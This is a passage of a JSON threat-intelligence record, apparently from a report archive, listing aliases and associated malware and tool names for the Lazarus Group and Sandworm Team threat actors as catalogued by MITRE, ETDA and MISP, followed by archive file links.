				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434359,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.pdf",
		"text": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.txt",
		"img": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.jpg"
	}
}